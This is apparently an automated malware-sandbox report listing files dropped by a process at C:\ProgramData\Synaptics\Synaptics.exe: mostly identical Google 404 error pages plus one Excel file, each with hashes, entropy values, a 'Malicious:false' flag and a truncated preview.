                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_rbhZCWCt2V4FeQw48eKGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.261268340585181
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                            MD5:96A7E33473532A77B60B745A64233BA4
                                                                                                            SHA1:70A05D0C45930087648299DF365D241B7B1E0181
                                                                                                            SHA-256:7ACC7DF3B29933D36A386BAEDFD96190C9F702B6978335924D64907E7C6EF152
                                                                                                            SHA-512:B8F846388636E1C512B2AAE772F00D24F88242B175571FAB99720181F879C56685B7CE143B79438C440E774D8F6060E47014B9130973571AEC01B7468BE53423
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="G9WnpFveJ3FNeGVFxJg7gQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.268158351951635
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0RSSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+aS+pAZewRDK4mW
                                                                                                            MD5:FB0AFE406E110900A9209D37CFC1A99B
                                                                                                            SHA1:928FD1C2C27958F26F71334A56F485136DB9FB46
                                                                                                            SHA-256:8BCE5E666FCF0D057EF9A1CA4CF023BBD59CB8F52B664E0296A168D97CE95230
                                                                                                            SHA-512:E69DA4087502CEE6AD56D637E1A25E119E7E216AF1AF1FBFE7721F3C0991293F250D554229B408272D6C34333114DC19BDEC59D26B969C6FC3D9537A92269635
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cShHrA4g8gFGGG4PUK34KA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.246809538463913
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0zQaKISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+VVI+pAZewRDK4mW
                                                                                                            MD5:0E96B9D26002092ADD6AE517B4F7D4E1
                                                                                                            SHA1:4B208D3EB7C6398E0D21B5B69C588EDF88EFBDC4
                                                                                                            SHA-256:7B3E9C7249B0F561AC8D084D6B2352D9684D8267E15A6AB4FDC92C94DC0117ED
                                                                                                            SHA-512:FE4FC443529CA73399632CF85DCD6AA3E2E64FDC6E269EEB980F9BBAC86937A1638A2F158FD8F73FEA533692EFC290D9AB5B97FF996336C8BCCCC6E88CC97FAF
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g8fiNRUt1R3keaem4oGuNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.266720920822971
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+06SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                            MD5:7BD0DAB03F6F3743DDB8875819F1A0AF
                                                                                                            SHA1:A38A45255AB0945FB29B84FA6AD47559B3C189EB
                                                                                                            SHA-256:BD8F98739BC47A136F2B1394C69BA9E3246B4B6647EA19601E4B241265F66FEF
                                                                                                            SHA-512:F79BA120B8E1EA3787423A565E37FB82A23DC17E5930B9F45AD824B09C1EB825902D075E5EB94F8DDBB8A0D094905988FD4623BD635D772A11ECED8928FB472A
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mOXaOgGKjzO5JvtU9Y-yRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.252370185546016
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0p8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                            MD5:44506FC084D65C78FE0FB30C3B265852
                                                                                                            SHA1:4BB1F2BB71B467C6105B98449D03E4C8B776A3CC
                                                                                                            SHA-256:81C06A7E4949A71788FD74637B210326D4E553C9A032C8B8D7A6C2F11D6D14ED
                                                                                                            SHA-512:3CA6B044B5FB2AA0698A803F78A4BDA0EACD029FB3E2CE2922E8486B176511E1B8AF616C51BB88CA4EA93DE62B0E1EC3C322366B61F7E1234820120F70B90EBD
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9hQL10eFTnhFFnxSodvJVg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.241660288722936
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0q8qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x8q+pAZewRDK4mW
                                                                                                            MD5:0449F39952B4878E2F765632E15DF440
                                                                                                            SHA1:75118D26653B0E9067FD56E3E77254E88CE9E42C
                                                                                                            SHA-256:15A92AB3B169E021F904F2422831DF85EBCFB7BE620DB5A812B57544C1AE3A7A
                                                                                                            SHA-512:10DDFCF53D30CE91834C90527228CACA908277EBB0A36CADD288C4E8D3B26F4D2AEF02A663199763AA11F1E02D4619D48AC82B710300BE1E322292A9E5EE1A6B
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nK038HMet7qime0woae-Pg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.259495819743867
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0p0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I0Q+pAZewRDK4mW
                                                                                                            MD5:8C723D9ACEF39AB092E160BB87BDE8CE
                                                                                                            SHA1:938B0A8012B767CA2A28BF8F10C2405A0783DEAB
                                                                                                            SHA-256:BF0F478F404B88BD1B8F65D7B2B4C5581F8FA5334105DDC226797FC0F07C67D4
                                                                                                            SHA-512:8C949A3E7F46A2C03307597AFDABF8D2AF0623684D7B6DB48A6FDB3CAE03B98089CE53E10FA94801320D668476FDD707F708A63A501A956E5BCD820A040C948A
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UlC9creBsqHFDRwIbcn05Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.263179832571627
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0kISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tI+pAZewRDK4mW
                                                                                                            MD5:6DC65D8B24FCD79727F796946C5FF3FE
                                                                                                            SHA1:2764BB0302160DE1C0B6A0C585BFE312BE24F2A5
                                                                                                            SHA-256:73E05380B106DCB9B0E020F077C1BD0AAADB4479F2AC797051C68A8C44CF997C
                                                                                                            SHA-512:FDD98B90E206DA807F23C8066D1885433197E93204BB6258C163BE61F7E2EB98F931CE1FFED5FDB2E5669F69C873F1FCF4F327ADEE33FEB730449F7B60361649
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mJhFM1kHDsM47hmcfj19vA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                            Category:dropped
                                                                                                            Size (bytes):18387
                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                            Malicious:false
                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.267938488879388
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                            MD5:38B0D343D928D6251C142A047A4C07C2
                                                                                                            SHA1:50765BDEF7D30728EE37B1621D0EA50D715759C3
                                                                                                            SHA-256:3165BB6231CEE9BBE6FE1C46C82C7180C1888ED6B6E7D402119948189F9537C6
                                                                                                            SHA-512:996F587D6E1A6227725A98A1C0EEBF2F417F2ECDF6A2731B36F916406867C885C2A3B60951B87A6C067BB6E8B7A30288AAC4D3E976F0A7C9E3B84CC3AC4EED44
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1rOeOqt8XkGv6m_DTX_yAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.263724377353559
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0UFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9F+pAZewRDK4mW
                                                                                                            MD5:83D909511F3D7C6FD85E6EE7064640FC
                                                                                                            SHA1:6B5C55766859FC5D8C0637299E83394FDAE5DEED
                                                                                                            SHA-256:D7F3DB503161B79F5CE2BCD0D6662E3490FBF07A73919BF3BEC0B5D29A239E16
                                                                                                            SHA-512:63E8F796B9DEDE5D914F5B7AA8B25443482C70B64109AF3809860F248D890D7CADB0BC438B5DDF4F83ADDEB2A49966AF48F1D1C320EDBD0093351F7D6BBFBFD0
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Fw7Bkusq4nXMBeIwBfVlFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.264654644011913
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                            MD5:5B4CE9F0653FE5B11B3C716C747751F4
                                                                                                            SHA1:B6F668B9FD85FEDD4DA399F86CBB25C6F7B5EAA7
                                                                                                            SHA-256:9C00444786F9CB46CBFE290A87C40DF5206311E465A2024651EB42CFD16ED7EA
                                                                                                            SHA-512:D35290C58F19727923253B94FD113A7B418E16CEA68DE0DE3CD36DC27D25EB0B12D502AFB6C4D4B105CE0DBCE77155F5EE54A3B7A0B9C9BEE8935B5C2FB2842D
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vnoVfaGCZPI2_EsYvh8A_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.2550302521012355
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+04gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                            MD5:65A9D7DF607B88155A5F64A6F46984CA
                                                                                                            SHA1:66A18260A236DE5E61DA4E6C3323BF109240DA3F
                                                                                                            SHA-256:A06140A3D6B17B5CF52B99916FB20992CF46F531C464E4373D42A030501DA0E4
                                                                                                            SHA-512:538FEDEF0179CBE81D52BA5CF1DB3EAC2DF7C08E191C362F343DFB55E930A44515B50627B3CEB5A3B88ABABE8374EE7569CC020A022DD6E894C8BDFD7F00A09E
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cJSsRUzhTfR_26sprqfuuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.25535642388012
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+01jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                            MD5:081D05E49146D9CC5C281670F1226CF3
                                                                                                            SHA1:0CA9C99E78EBB6F5FDF2EEE5F07A7EB21F18FADE
                                                                                                            SHA-256:5F72035FD4AFED97871B6EBD85D448E0B8A69D9CEFFF2B6D104078EDA47773E4
                                                                                                            SHA-512:C29A1F93C805AD94D7ACCCF5C0128AB884EB25984E8525AAE62EE1A4F1CC338BF2E1F0821C5DFADE22ECE6641F72E6707E652B29FC34E273A28D8F76B963EB42
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mo1GUf3coQuW3Gbg9FaAfA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                            Category:dropped
                                                                                                            Size (bytes):18387
                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                            Malicious:false
                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.257531702055452
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0DCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+h+pAZewRDK4mW
                                                                                                            MD5:C9B4C2DE97FB34BE612820B709B1573F
                                                                                                            SHA1:3BD5AB31DB5D1457D6A971FFA91A6DF2FE1AA7A7
                                                                                                            SHA-256:5BBD34F878473770A5764AC870049638EC836E15AC9222A80C72FF6B629C63D4
                                                                                                            SHA-512:4E78D03921F354E205B687E85A05BB03CB59351BE2D2B435BDAEC6B0EE38C0A8E58573FE6A9CF527091AED1C98F2DEC678C53922151B7AB8610231721DBAA152
